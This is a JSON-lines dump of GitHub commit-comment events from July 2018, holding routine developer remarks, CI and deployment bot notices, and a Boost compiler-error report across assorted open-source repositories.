{"id":"7952513489","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29676744,"position":null,"line":null,"path":null,"commit_id":"572aebfc1f5c1e40fadcc61d40439cbea811986c","created_at":"2018-07-11T20:51:41Z","updated_at":"2018-07-11T20:51:41Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-11T20:51:41Z"}
{"id":"7952515482","type":"CommitCommentEvent","actor":{"login":"coriolinus"},"repo":{"name":"exercism/rust"},"payload":{"comment":{"id":29676750,"position":14,"line":23,"path":"config.json","commit_id":"e7fb51026912753414601d8dd1c5fafb15683216","created_at":"2018-07-11T20:52:06Z","updated_at":"2018-07-11T20:52:06Z","author_association":"CONTRIBUTOR","body":"The name in the problem specifications is [two-fer](https://github.com/exercism/problem-specifications/tree/master/exercises/two-fer), not twofer, and we were running into trouble with automating `configlet generate` as a result.\r\n\r\nEntirely orthogonally, there was some discussion about the input signature: the initial implementation assumed that empty strings would have a special meaning, but there's a strong argument that that's bad practice in rust; one should use an Option instead. The counter argument was that introducing Option in the second exercise might make the learning curve uncomfortably steep.\r\n\r\nIn the end, I was up late rearranging the exercise tree to conform to v2 requirements, and decided to just fix both the problems at once: rename it to fix the configlet problem, and deprecate it to get it out of the exercise list anyway.\r\n\r\nShould this have happened in a separate commit, or even better, a separate PR? Probably yes. I can only say mea culpa. On the other hand, breaking v2 was not a predictable consequence of this rename."}},"created_at":"2018-07-11T20:52:06Z"}
{"id":"7952520281","type":"CommitCommentEvent","actor":{"login":"msyriac"},"repo":{"name":"msyriac/orphics"},"payload":{"comment":{"id":29676767,"position":null,"line":null,"path":null,"commit_id":"456704653db41174a3a9bbec45c9a14dc63502af","created_at":"2018-07-11T20:53:04Z","updated_at":"2018-07-11T20:53:04Z","author_association":"OWNER","body":"Not a bug fix to the estimator itself, but just the interface. Not a malicious or subtle bug. Just gives you an error if you don't explicitly provide BB power."}},"created_at":"2018-07-11T20:53:04Z"}
{"id":"7952534058","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/thrift-feedstock"},"payload":{"comment":{"id":29676810,"position":null,"line":null,"path":null,"commit_id":"e89ffc2eaf554703bea81d670c66d320645d09bb","created_at":"2018-07-11T20:55:52Z","updated_at":"2018-07-11T20:55:52Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @marshall245 were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @marshall245 were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-11T20:55:52Z"}
{"id":"7952536060","type":"CommitCommentEvent","actor":{"login":"Andyshon"},"repo":{"name":"Andyshon/Database-Using-RxJava"},"payload":{"comment":{"id":29676815,"position":1,"line":59,"path":"app/src/main/java/com/andyshon/databaseusingrxjava/Activity/MainActivity.java","commit_id":"3c6ef93cab9070435171dbbe17a3336eba4eebf1","created_at":"2018-07-11T20:56:17Z","updated_at":"2018-07-11T20:56:17Z","author_association":"OWNER","body":"sd"}},"created_at":"2018-07-11T20:56:17Z"}
{"id":"7952536803","type":"CommitCommentEvent","actor":{"login":"derjanb"},"repo":{"name":"derjanb/test"},"payload":{"comment":{"id":29676820,"position":null,"line":null,"path":null,"commit_id":"7c7b9257a1dbd849ddf0642524c85224e41325b2","created_at":"2018-07-11T20:56:26Z","updated_at":"2018-07-11T20:56:26Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/767504/42598819-a1fb04a0-855d-11e8-8b42-a86abf577d82.png)\r\n"}},"created_at":"2018-07-11T20:56:26Z"}
{"id":"7952537149","type":"CommitCommentEvent","actor":{"login":"ssw3r"},"repo":{"name":"ssw3r/pantheon-give-to-uva"},"payload":{"comment":{"id":29676822,"position":null,"line":null,"path":null,"commit_id":"7f38dbd7b44a466f60914370b44b186aeccff284","created_at":"2018-07-11T20:56:30Z","updated_at":"2018-07-11T20:56:30Z","author_association":"OWNER","body":"Created multidev environment [pantheon-give-to-uva#ci-11](https://dashboard.pantheon.io/sites/b74c531d-f25b-4a5a-8aca-813c48288835#ci-11).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-11-pantheon-give-to-uva.pantheonsite.io/)"}},"created_at":"2018-07-11T20:56:30Z"}
{"id":"7952547261","type":"CommitCommentEvent","actor":{"login":"a500drvr"},"repo":{"name":"tbyerly/agility2018-dhd"},"payload":{"comment":{"id":29676842,"position":null,"line":null,"path":null,"commit_id":"accc7786eab8175cba1b3c6dc6873c01b8bc39bc","created_at":"2018-07-11T20:58:35Z","updated_at":"2018-07-11T20:58:35Z","author_association":"NONE","body":"behind"}},"created_at":"2018-07-11T20:58:35Z"}
{"id":"7952554667","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29676862,"position":null,"line":null,"path":null,"commit_id":"ed86015dbc23de5589d4d8e65a7af058277e674b","created_at":"2018-07-11T21:00:11Z","updated_at":"2018-07-11T21:00:11Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T21:00:11Z"}
{"id":"7952556424","type":"CommitCommentEvent","actor":{"login":"dongilbert"},"repo":{"name":"mautic/mautic"},"payload":{"comment":{"id":29676872,"position":55,"line":55,"path":"app/bundles/LeadBundle/Segment/Query/Expression/CompositeExpression.php","commit_id":"53218d831b66efa257789157dc43ada31f345b53","created_at":"2018-07-11T21:00:29Z","updated_at":"2018-07-11T21:00:29Z","author_association":"MEMBER","body":"Unlikely, as they are core to Doctrine and we would rather not start extending the api outside of what they offer that’s not specific to our Mautic required usage. \r\n\r\nHowever, I think they are already available via `getQueryPart`, although I’m typing this on mobile and can’t currently check. "}},"created_at":"2018-07-11T21:00:29Z"}
{"id":"7952559738","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29676878,"position":null,"line":null,"path":null,"commit_id":"d0b77e623c2084355d706d3e199339876916fc64","created_at":"2018-07-11T21:01:10Z","updated_at":"2018-07-11T21:01:10Z","author_association":"COLLABORATOR","body":"<h3>[docs] update 1.x and 2.x sites (#2678)</h3>\n\nPreview: <strong><a href='https://18449-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18449-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18449-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T21:01:10Z"}
{"id":"7952561901","type":"CommitCommentEvent","actor":{"login":"dongilbert"},"repo":{"name":"mautic/mautic"},"payload":{"comment":{"id":29676884,"position":5,"line":90,"path":"app/bundles/LeadBundle/Services/LeadSegmentQueryBuilder.php","commit_id":"53218d831b66efa257789157dc43ada31f345b53","created_at":"2018-07-11T21:01:35Z","updated_at":"2018-07-11T21:01:35Z","author_association":"MEMBER","body":"I know it’s wip but we need to be sure to remove these. "}},"created_at":"2018-07-11T21:01:35Z"}
{"id":"7952562885","type":"CommitCommentEvent","actor":{"login":"coriolinus"},"repo":{"name":"exercism/rust"},"payload":{"comment":{"id":29676887,"position":19,"line":28,"path":"config.json","commit_id":"e7fb51026912753414601d8dd1c5fafb15683216","created_at":"2018-07-11T21:01:48Z","updated_at":"2018-07-11T21:01:48Z","author_association":"CONTRIBUTOR","body":"See other reply."}},"created_at":"2018-07-11T21:01:48Z"}
{"id":"7952568460","type":"CommitCommentEvent","actor":{"login":"boly38"},"repo":{"name":"geokrety/geokrety-website"},"payload":{"comment":{"id":29676901,"position":7,"line":15,"path":"website/kontakt.php","commit_id":"04fd4fb241c06b7536034e7d452d54c7ac6a851d","created_at":"2018-07-11T21:02:57Z","updated_at":"2018-07-11T21:02:57Z","author_association":"MEMBER","body":"@kumy did you know that this image is missing?"}},"created_at":"2018-07-11T21:02:57Z"}
{"id":"7952570470","type":"CommitCommentEvent","actor":{"login":"marcoabreu"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29676908,"position":22,"line":208,"path":"tests/python/unittest/test_gluon_data.py","commit_id":"958ad4208a762cb729e1f635b385afcd23516fba","created_at":"2018-07-11T21:03:23Z","updated_at":"2018-07-11T21:03:23Z","author_association":"CONTRIBUTOR","body":"No need for that comment :)"}},"created_at":"2018-07-11T21:03:23Z"}
{"id":"7952572447","type":"CommitCommentEvent","actor":{"login":"jbeich"},"repo":{"name":"boostorg/optional"},"payload":{"comment":{"id":29676914,"position":null,"line":null,"path":null,"commit_id":"71d797b9ee132b381c2d4f3b5bcca2078b0a5062","created_at":"2018-07-11T21:03:48Z","updated_at":"2018-07-11T21:03:48Z","author_association":"NONE","body":"`BOOST_OPTIONAL_CONFIG_USE_OLD_IMPLEMENTATION_OF_OPTIONAL` no longer builds after this commit. See also https://github.com/freeorion/freeorion/issues/2211\r\n\r\n```c++\r\n$ c++ -v                                                                                                        ~\r\nFreeBSD clang version 6.0.1 (tags/RELEASE_601/final 335540) (based on LLVM 6.0.1)\r\nTarget: x86_64-unknown-freebsd12.0\r\nThread model: posix\r\nInstalledDir: /usr/bin\r\n\r\n$ cat a.cc\r\n#define BOOST_OPTIONAL_CONFIG_USE_OLD_IMPLEMENTATION_OF_OPTIONAL\r\n#include <boost/optional.hpp>\r\n\r\n$ c++ -c a.cc -isystem/usr/local/include\r\nIn file included from a.cc:2:\r\nIn file included from /usr/local/include/boost/optional.hpp:15:\r\nIn file included from /usr/local/include/boost/optional/optional.hpp:1462:\r\n/usr/local/include/boost/optional/detail/optional_reference_spec.hpp:174:40: error: no type named\r\n      'optional_value_type' in namespace 'boost::optional_detail'\r\n    optional<typename optional_detail::optional_value_type<typename boost::result_of<F(T&)>::type>::type> ...\r\n             ~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~\r\n/usr/local/include/boost/optional/detail/optional_reference_spec.hpp:174:94: error: member 'type' declared as a\r\n      template\r\n    optional<typename optional_detail::optional_value_type<typename boost::result_of<F(T&)>::type>::type> ...\r\n                                                                                             ^\r\n/usr/local/include/boost/optional/detail/optional_reference_spec.hpp:174:98: error: expected ';' at end of\r\n      declaration list\r\n    optional<typename optional_detail::optional_value_type<typename boost::result_of<F(T&)>::type>::type> ...\r\n                                                                                                 ^\r\n3 errors generated.\r\n```\r\n"}},"created_at":"2018-07-11T21:03:48Z"}
{"id":"7952573739","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29676919,"position":null,"line":null,"path":null,"commit_id":"ad46b7cb0e848398b3221bb6718049e91bc2b7ba","created_at":"2018-07-11T21:04:05Z","updated_at":"2018-07-11T21:04:05Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-28](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-28).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-28-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-11T21:04:05Z"}
{"id":"7952573949","type":"CommitCommentEvent","actor":{"login":"ludeeus"},"repo":{"name":"custom-components/custom_cards"},"payload":{"comment":{"id":29676920,"position":74,"line":90,"path":"custom_components/custom_cards.py","commit_id":"59909c287e475ae4e7b722698dadc2449f11053b","created_at":"2018-07-11T21:04:08Z","updated_at":"2018-07-11T21:04:08Z","author_association":"CONTRIBUTOR","body":"agreed 👍 "}},"created_at":"2018-07-11T21:04:08Z"}
{"id":"7952574068","type":"CommitCommentEvent","actor":{"login":"Ericson2314"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29676921,"position":null,"line":null,"path":null,"commit_id":"8f2832a5d79838bcf7c2152179590f21c793c9d6","created_at":"2018-07-11T21:04:10Z","updated_at":"2018-07-11T21:04:10Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-11T21:04:10Z"}
{"id":"7952575061","type":"CommitCommentEvent","actor":{"login":"p14n"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29676922,"position":80,"line":67,"path":"contracts/RockPaperScissors.sol","commit_id":"b519f5f5af99b419d90c8e9e86b010ad770785ca","created_at":"2018-07-11T21:04:22Z","updated_at":"2018-07-11T21:04:22Z","author_association":"OWNER","body":"That was definitely the wrong answer"}},"created_at":"2018-07-11T21:04:22Z"}
{"id":"7952575132","type":"CommitCommentEvent","actor":{"login":"marcoabreu"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29676923,"position":29,"line":215,"path":"tests/python/unittest/test_gluon_data.py","commit_id":"958ad4208a762cb729e1f635b385afcd23516fba","created_at":"2018-07-11T21:04:23Z","updated_at":"2018-07-11T21:04:23Z","author_association":"CONTRIBUTOR","body":"Could you elaborate on this? Shouldn't we rather have some kind of Boolean we set in here and then assert it outside the loop to ensure it actually worked?"}},"created_at":"2018-07-11T21:04:23Z"}
{"id":"7952577126","type":"CommitCommentEvent","actor":{"login":"p14n"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29676932,"position":131,"line":131,"path":"contracts/RockPaperScissors.sol","commit_id":"7fb6294713f9e356481021063ccc46683846abc7","created_at":"2018-07-11T21:04:46Z","updated_at":"2018-07-11T21:04:46Z","author_association":"OWNER","body":"Corrected - checked for player 2 winning condition"}},"created_at":"2018-07-11T21:04:46Z"}
{"id":"7952582560","type":"CommitCommentEvent","actor":{"login":"reynier2"},"repo":{"name":"reynier2/hello-world"},"payload":{"comment":{"id":29676945,"position":null,"line":null,"path":null,"commit_id":"100033a275e6379a206965d376f259d21c356b5b","created_at":"2018-07-11T21:05:50Z","updated_at":"2018-07-11T21:05:50Z","author_association":"OWNER","body":"sorry I have been away for a while but now I'm back still need help"}},"created_at":"2018-07-11T21:05:50Z"}
{"id":"7952585727","type":"CommitCommentEvent","actor":{"login":"Ericson2314"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29676953,"position":null,"line":null,"path":null,"commit_id":"48ccdf322d9e7a68d0caf5833511ee3e53ec7d3a","created_at":"2018-07-11T21:06:29Z","updated_at":"2018-07-11T21:06:29Z","author_association":"MEMBER","body":"Sorry. It's `fixedPoints`. Maybe let's try to get ofbog to eval this stuff somehow? "}},"created_at":"2018-07-11T21:06:29Z"}
{"id":"7952586072","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29676954,"position":null,"line":null,"path":null,"commit_id":"3ecf639db9dedde1801ea6e80998f2b622af051e","created_at":"2018-07-11T21:06:33Z","updated_at":"2018-07-11T21:06:33Z","author_association":"CONTRIBUTOR","body":"This is looking good.  FYI, I've republished the files on the website."}},"created_at":"2018-07-11T21:06:33Z"}
{"id":"7952588139","type":"CommitCommentEvent","actor":{"login":"kumy"},"repo":{"name":"geokrety/geokrety-website"},"payload":{"comment":{"id":29676960,"position":7,"line":15,"path":"website/kontakt.php","commit_id":"04fd4fb241c06b7536034e7d452d54c7ac6a851d","created_at":"2018-07-11T21:06:57Z","updated_at":"2018-07-11T21:06:57Z","author_association":"MEMBER","body":"I've pushed to image to the cdn https://cdn.geokrety.org/images/emailowy_adres.png"}},"created_at":"2018-07-11T21:06:57Z"}
{"id":"7952590156","type":"CommitCommentEvent","actor":{"login":"EOS9Cat"},"repo":{"name":"EOS9Cat/documentation"},"payload":{"comment":{"id":29676965,"position":47,"line":47,"path":"Reason and Solution for 'the database dirty flag set' and Snapshot Backup&Restore/Reason and Solution for 'database dirty flag' and Snapshot Backup&Restore.md","commit_id":"d798c9f89a05e2a35017a97b782fd1b110aebb66","created_at":"2018-07-11T21:07:24Z","updated_at":"2018-07-11T21:07:24Z","author_association":"OWNER","body":"updated at fc7826e"}},"created_at":"2018-07-11T21:07:24Z"}
{"id":"7952593631","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29676975,"position":null,"line":null,"path":null,"commit_id":"095f262a75cda4d54f01c9355aa7f8fbcf55b355","created_at":"2018-07-11T21:08:08Z","updated_at":"2018-07-11T21:08:08Z","author_association":"OWNER","body":"This should make it easier to add stuff to the game"}},"created_at":"2018-07-11T21:08:08Z"}
{"id":"7952593950","type":"CommitCommentEvent","actor":{"login":"redpolarbear"},"repo":{"name":"EOS9Cat/documentation"},"payload":{"comment":{"id":29676976,"position":null,"line":null,"path":null,"commit_id":"d798c9f89a05e2a35017a97b782fd1b110aebb66","created_at":"2018-07-11T21:08:11Z","updated_at":"2018-07-11T21:08:11Z","author_association":"COLLABORATOR","body":"updated in fc7826e"}},"created_at":"2018-07-11T21:08:11Z"}
{"id":"7952594666","type":"CommitCommentEvent","actor":{"login":"redpolarbear"},"repo":{"name":"EOS9Cat/documentation"},"payload":{"comment":{"id":29676977,"position":1,"line":1,"path":"Reason and Solution for 'the database dirty flag set' and Snapshot Backup&Restore/Reason and Solution for 'database dirty flag' and Snapshot Backup&Restore.md","commit_id":"d798c9f89a05e2a35017a97b782fd1b110aebb66","created_at":"2018-07-11T21:08:21Z","updated_at":"2018-07-11T21:08:21Z","author_association":"COLLABORATOR","body":"updated in fc7826e"}},"created_at":"2018-07-11T21:08:21Z"}
{"id":"7952594941","type":"CommitCommentEvent","actor":{"login":"redpolarbear"},"repo":{"name":"EOS9Cat/documentation"},"payload":{"comment":{"id":29676978,"position":5,"line":5,"path":"Reason and Solution for 'the database dirty flag set' and Snapshot Backup&Restore/Reason and Solution for 'database dirty flag' and Snapshot Backup&Restore.md","commit_id":"d798c9f89a05e2a35017a97b782fd1b110aebb66","created_at":"2018-07-11T21:08:24Z","updated_at":"2018-07-11T21:08:24Z","author_association":"COLLABORATOR","body":"updated in fc7826e"}},"created_at":"2018-07-11T21:08:24Z"}
{"id":"7952595166","type":"CommitCommentEvent","actor":{"login":"redpolarbear"},"repo":{"name":"EOS9Cat/documentation"},"payload":{"comment":{"id":29676979,"position":26,"line":26,"path":"Reason and Solution for 'the database dirty flag set' and Snapshot Backup&Restore/Reason and Solution for 'database dirty flag' and Snapshot Backup&Restore.md","commit_id":"d798c9f89a05e2a35017a97b782fd1b110aebb66","created_at":"2018-07-11T21:08:27Z","updated_at":"2018-07-11T21:08:27Z","author_association":"COLLABORATOR","body":"updated in fc7826e"}},"created_at":"2018-07-11T21:08:27Z"}
{"id":"7952595495","type":"CommitCommentEvent","actor":{"login":"redpolarbear"},"repo":{"name":"EOS9Cat/documentation"},"payload":{"comment":{"id":29676981,"position":47,"line":47,"path":"Reason and Solution for 'the database dirty flag set' and Snapshot Backup&Restore/Reason and Solution for 'database dirty flag' and Snapshot Backup&Restore.md","commit_id":"d798c9f89a05e2a35017a97b782fd1b110aebb66","created_at":"2018-07-11T21:08:31Z","updated_at":"2018-07-11T21:08:31Z","author_association":"COLLABORATOR","body":"updated in fc7826e"}},"created_at":"2018-07-11T21:08:31Z"}
{"id":"7952597748","type":"CommitCommentEvent","actor":{"login":"adithok"},"repo":{"name":"acasadoalonso/SGP-2D-Live-Tracking-data-gathering"},"payload":{"comment":{"id":29676988,"position":1,"line":1,"path":"doc/OGNDDB.sql","commit_id":"f0948855f8c8889e3639b3ece1b85e79336a183c","created_at":"2018-07-11T21:08:56Z","updated_at":"2018-07-11T21:08:56Z","author_association":"NONE","body":"Hi"}},"created_at":"2018-07-11T21:08:56Z"}
{"id":"7952598897","type":"CommitCommentEvent","actor":{"login":"evohnave"},"repo":{"name":"databricks/Spark-The-Definitive-Guide"},"payload":{"comment":{"id":29676991,"position":null,"line":null,"path":null,"commit_id":"130ff77bbc710093e84692a7fb58c7c7022d1ea7","created_at":"2018-07-11T21:09:11Z","updated_at":"2018-07-11T21:09:11Z","author_association":"CONTRIBUTOR","body":"Fix alias issue, fix 'DataFrame' object not callable errors"}},"created_at":"2018-07-11T21:09:11Z"}
{"id":"7952599514","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29676994,"position":null,"line":null,"path":null,"commit_id":"df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6","created_at":"2018-07-11T21:09:17Z","updated_at":"2018-07-11T21:09:17Z","author_association":"NONE","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2018-07-11T21:09:17Z"}
{"id":"7952601209","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29677000,"position":null,"line":null,"path":null,"commit_id":"20ee8626fb720c89dd84cc9e3c0e48f3a6bb629a","created_at":"2018-07-11T21:09:38Z","updated_at":"2018-07-11T21:09:38Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/scottschurr/rippled/commit/20ee8626fb720c89dd84cc9e3c0e48f3a6bb629a)\n\nBuilt at __20180711 - 21:09:38__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nrpm | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/coverage.txt) | 1035 cases, 0 failed, t: 691s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 1 failed, t: 792s | FAIL :red_circle: \ndocs | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 561s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 249s | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 490s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 339s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1232s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 247s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 151s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 338s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 354s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 246s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/4//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 515s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-11T21:09:38Z"}
{"id":"7952605983","type":"CommitCommentEvent","actor":{"login":"officeguy"},"repo":{"name":"officeguy/test"},"payload":{"comment":{"id":29677006,"position":null,"line":null,"path":null,"commit_id":"b078a07de11da47fff206ad29d4d6b04b28b6cd3","created_at":"2018-07-11T21:10:36Z","updated_at":"2018-07-11T21:10:36Z","author_association":"OWNER","body":"test webhook"}},"created_at":"2018-07-11T21:10:36Z"}
{"id":"7952608208","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29677011,"position":null,"line":null,"path":null,"commit_id":"e75b7b4b3e4646bff143e5ac8d21f8eb6bb79c0b","created_at":"2018-07-11T21:11:03Z","updated_at":"2018-07-11T21:11:03Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T21:11:03Z"}
{"id":"7952612125","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29677019,"position":null,"line":null,"path":null,"commit_id":"7eb0535a98f2c3548ef93d62f7a00de138bac4bc","created_at":"2018-07-11T21:11:51Z","updated_at":"2018-07-11T21:11:51Z","author_association":"COLLABORATOR","body":"Also see [Issue 660](https://github.com/weidai11/cryptopp/issues/660)."}},"created_at":"2018-07-11T21:11:51Z"}
{"id":"7952616330","type":"CommitCommentEvent","actor":{"login":"ryangueraa"},"repo":{"name":"cssnano/cssnano"},"payload":{"comment":{"id":29677029,"position":8,"line":106,"path":"packages/cssnano/src/__tests__/postcss-merge-longhand.js","commit_id":"2b6f26443fcb28f7e355f46637a75414ff419703","created_at":"2018-07-11T21:12:43Z","updated_at":"2018-07-11T21:12:43Z","author_association":"NONE","body":"\r\n    'h1{margin:10px 20px 30px 40px}',"}},"created_at":"2018-07-11T21:12:43Z"}
{"id":"7952617150","type":"CommitCommentEvent","actor":{"login":"NobbZ"},"repo":{"name":"exercism/rust"},"payload":{"comment":{"id":29677030,"position":14,"line":23,"path":"config.json","commit_id":"e7fb51026912753414601d8dd1c5fafb15683216","created_at":"2018-07-11T21:12:53Z","updated_at":"2018-07-11T21:12:53Z","author_association":"NONE","body":"I'm not trying to blame anyone, just trying to reference comments/commits and changes to wire possibly related things together."}},"created_at":"2018-07-11T21:12:53Z"}
{"id":"7952618247","type":"CommitCommentEvent","actor":{"login":"felipemoran"},"repo":{"name":"felipemoran/get-started-python"},"payload":{"comment":{"id":29677034,"position":null,"line":null,"path":null,"commit_id":"2a2f8f471203c5872296963cfe802d03bda4d10a","created_at":"2018-07-11T21:13:06Z","updated_at":"2018-07-11T21:13:06Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/bb723936-a2f8-428d-bc40-0670ef9c4242?env_id=ibm%3Ayp%3Aeu-gb \"test_toolchain_3\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/5d773d13-3e84-4c94-871e-3f81444267fd?env_id=ibm%3Ayp%3Aeu-gb \"test_pipeline\") deployed [get-started-python](https://github.com/felipemoran/get-started-python/releases/tag/deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180711-211300 \"deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180711-211300\") to [test](https://console.bluemix.net/apps/9c377974-010c-403a-b2a3-51a6463dfe1e?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:felipe.moran-correa-meyer:test\"), including this commit"}},"created_at":"2018-07-11T21:13:06Z"}
